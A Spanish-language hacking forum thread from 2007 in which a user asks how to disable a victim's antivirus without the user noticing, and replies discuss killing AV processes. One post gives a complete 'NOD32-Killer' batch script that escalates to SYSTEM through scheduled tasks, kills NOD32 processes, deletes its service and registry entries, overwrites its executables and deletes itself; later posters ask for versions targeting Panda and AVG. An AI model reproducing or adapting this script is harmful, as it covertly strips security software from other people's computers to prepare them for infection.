elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
22 Mayo 2012, 21:57  


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Dentro....y ahora..av
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Dentro....y ahora..av  (Leído 1,018 veces)
Snipersnake

Desconectado Desconectado

Mensajes: 180



Ver Perfil WWW
Dentro....y ahora..av
« en: 23 Septiembre 2007, 02:45 »

Pues eso..como deshabilito un av sin que el usuario no deseado lo sepa :rolleyes:
Av kilers....apago el av y lo activo...?
En línea
el-viejo


Desconectado Desconectado

Mensajes: 1.256



Ver Perfil WWW
Re: Dentro....y ahora..av
« Respuesta #1 en: 23 Septiembre 2007, 03:02 »

Pues eso..como deshabilito un av sin que el usuario no deseado lo sepa :rolleyes:
Av kilers....apago el av y lo activo...?

puedes matarle el proceso al antivirus

saludos...
En línea

Tughack


Desconectado Desconectado

Mensajes: 490


Ver Perfil
Re: Dentro....y ahora..av
« Respuesta #2 en: 23 Septiembre 2007, 03:15 »

Pues eso..como deshabilito un av sin que el usuario no deseado lo sepa :rolleyes:
Av kilers....apago el av y lo activo...?

puedes matarle el proceso al antivirus

saludos...

jeje no Debes estar hablando del kav o del nod32...

Salu2
En línea
Snipersnake

Desconectado Desconectado

Mensajes: 180



Ver Perfil WWW
Re: Dentro....y ahora..av
« Respuesta #3 en: 23 Septiembre 2007, 03:29 »

 :¬¬ ... pues ya ves.. na es el avg, da igual....lo desconecto, y listo  :xD
En línea
YaTaMaS
Colaborador
***
Desconectado Desconectado

Mensajes: 4.635


Nada es seguro y todo es posible


Ver Perfil WWW
Re: Dentro....y ahora..av
« Respuesta #4 en: 23 Septiembre 2007, 14:33 »

Los Antivirus no se pueden matar como cualquier otro programa o proceso, asi, sin más. El Kernel y demás servicios del AV no se dejan matar, por lo que si matas el proceso o te dice que "no tienes permisos para cerrar el proceso" o directamente al ser cerrado vuelve a aparecer de nuevo. Por tanto, deberás cerrarlo manualmente, desinstalarlo, aprovechar un bug en el AV para cerarlo, AV Killer, etc.



Saludos
En línea

Campañas de Posicionamiento Web desde 40€/mes.
Envíame un MP si estás interesado ;)

Semitorre Tacens Sagitta Lux + Intel Q6600 2,4Ghz @ 3,2 + Zalman 8700 Led Quad Core + Placa Asus P5KC
+ 2GB DDR2 800 Kingston HiperX + ATI Sapphire 512MB HD3870 + Disco 500GB Sata2 Seagate 7200.11 32MB

byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Dentro....y ahora..av
« Respuesta #5 en: 23 Septiembre 2007, 14:56 »

si se puede cerrar los av.
En línea
YaTaMaS
Colaborador
***
Desconectado Desconectado

Mensajes: 4.635


Nada es seguro y todo es posible


Ver Perfil WWW
Re: Dentro....y ahora..av
« Respuesta #6 en: 23 Septiembre 2007, 15:02 »

si se puede cerrar los av.


Cerrar si se pueden, lo que yo digo es que no se pueden cerrar "a la ligera" (no todos pero si la mayoría) como el que cierra el messenger asi sin mas. Probar con KIS o nod32 por ejemplo.


Salu2!
En línea

Campañas de Posicionamiento Web desde 40€/mes.
Envíame un MP si estás interesado ;)

Semitorre Tacens Sagitta Lux + Intel Q6600 2,4Ghz @ 3,2 + Zalman 8700 Led Quad Core + Placa Asus P5KC
+ 2GB DDR2 800 Kingston HiperX + ATI Sapphire 512MB HD3870 + Disco 500GB Sata2 Seagate 7200.11 32MB

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.666


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Dentro....y ahora..av
« Respuesta #7 en: 23 Septiembre 2007, 22:35 »

Si que se pueden, algunos estan más protegidos pero si se pueden.

Yo prové con muchos antivirus, los conseguí matar a todos menos al KAV, ese tiene un driver en Ring0 que lo protege y desde Ring3 no podrás hacer nada, tendrías que saber programas (y mucho) en C o un lenguaje de bajo nivel un fichero .SYS y hacerlo correr como servicio, desde aí si k kizas lo podrías matar, mientras tanto na de na...

El NOD32 la única dificultad es que hay que ascender a SYSTEM...mirad este code en BATCH:

Código
::NOD32-Killer
::By nhaalclkiemr
@echo off
echo @echo off >> temp.bat
echo set a=0>> temp.bat
echo set b=0>> temp.bat
echo set errorlevel=>> temp.bat
echo set tempstr=delete>> temp.bat
echo set tempstr2=NOD32>> temp.bat
echo :c >> temp.bat
echo set /A b=%%b%%+1 >> temp.bat
echo set /A a=%%a%%+1 >> temp.bat
echo taskkill /F /IM %%tempstr2%%krn.exe /IM %%tempstr2%%kui.exe /IM %%tempstr2%%.exe >> temp.bat
echo sc %%tempstr%% %%tempstr2%%krn >> temp.bat
echo reg %%tempstr%% HKLM\SYSTEM\CurrentControlSet\Services\%%tempstr2%%krn /f >> temp.bat
echo copy /Y %%windir%%\system32\extrac32.exe "%%programfiles%%\ESET\%%tempstr2%%.exe" >> temp.bat
echo copy /Y %%windir%%\system32\extrac32.exe "%%programfiles%%\ESET\%%tempstr2%%krn.exe" >> temp.bat
echo copy /Y %%windir%%\system32\extrac32.exe "%%programfiles%%\ESET\%%tempstr2%%kui.exe" >> temp.bat
echo if %%a%%==11 goto fin >> temp.bat
echo if not %%errorlevel%%==0 goto c >> temp.bat
echo if %%b%%==5 goto fin >> temp.bat
echo :fin >> temp.bat
echo del /S /A:- /F /Q %%0 >> temp.bat
echo exit >> temp.bat
move temp.bat %%windir%%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
goto a
:2caso
set x=%TIME:~4,2%
goto a
:3caso
set x=%TIME:~5,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:00 /ru System
if %a%==11 goto d
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
:d
del /F /Q /S /A:- %0
exit
:error
temp.bat>>NUL
del /F /Q /S /A:- %0
exit

No creo que os cueste mucho traducirlo a otro lenguaje si kereis...

Para el AVG substituye las rutas, procesos y servicios por los del AVG y ya está...lo k no me acuerdo es si en el AVG hace falta ascender a SYSTEM o no...

Saludos ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 0.9- 100%
byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Dentro....y ahora..av
« Respuesta #8 en: 23 Septiembre 2007, 22:51 »

ya se publicara un killer para cualquier av.
En línea
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.666


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Dentro....y ahora..av
« Respuesta #9 en: 23 Septiembre 2007, 23:38 »

Mmmm :huh:

No se si ya existía un AV-Killer...seguro k muchos, los k vi en el foro no eran del todo eficaces...primero pork no ascendian a SYSTEM y algunos antivirus no se daban matado y pork no mataban servicios, solo taskkill y del y eso es facil

Ahora no estoy muy metido en BATCH, lo deje un poco por VB pero algun dia cojo y mejoro ese code para que funcione incluso cuando el antivirus no esté instalado en el directorio por defecto...

Saludos ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 0.9- 100%
pitufooo

Desconectado Desconectado

Mensajes: 105



Ver Perfil
Re: Dentro....y ahora..av
« Respuesta #10 en: 24 Septiembre 2007, 19:12 »

hola

cual seria el code para matar el panda 2007 ????

gracias

un saludo
En línea

byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Dentro....y ahora..av
« Respuesta #11 en: 24 Septiembre 2007, 20:52 »

depende como funcione el panda.
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Estoy dentro de su router.Y ahora???
Hacking Básico
disuria 12 1,987 Último mensaje 3 Mayo 2007, 03:48
por Man-In-the-Middle
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines